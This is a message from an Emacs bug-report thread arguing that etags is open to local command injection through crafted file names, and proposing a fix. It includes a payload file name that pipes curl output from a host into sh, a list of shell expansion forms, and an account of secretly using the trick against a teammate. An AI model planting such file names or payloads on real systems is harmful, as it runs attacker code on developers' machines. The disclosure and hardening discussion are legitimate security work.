bug#59817: [PATCH] Fix etags local command injection vulnerability
From:
lux
Subject:
bug#59817: [PATCH] Fix etags local command injection vulnerability
Date:
Mon, 5 Dec 2022 08:58:13 +0800
> Please understand: etags is a stable program. I'm not interested in > changes that modify its design or implementation in such drastic ways.
I understand, but not completely agree, stable != security.
Why use the system() function? This is a lazy, insecure little trick, the exec*(such as execvp) function should be used first. We need execute a command, but we don't need execute a shell script.
Example a case, In my team, some people like automatically pull new code from code server, and use etags update tags, so I secretly uploaded a new file, the file name is:
$ touch "';curl myhost|sh #'a.z"
when he automatically update the tags, I hacking his computer.
So, I have two suggestions:
1. don't use system(), unless know what are doing.
2. escape all dangerous characters, just escaping quotes is not enough, the following characters can perform additional actions:
"$(ls)" "`ls`" "${SHELL}" "$SHELL"
I'm writing a new patch to escape dangerous characters, and test.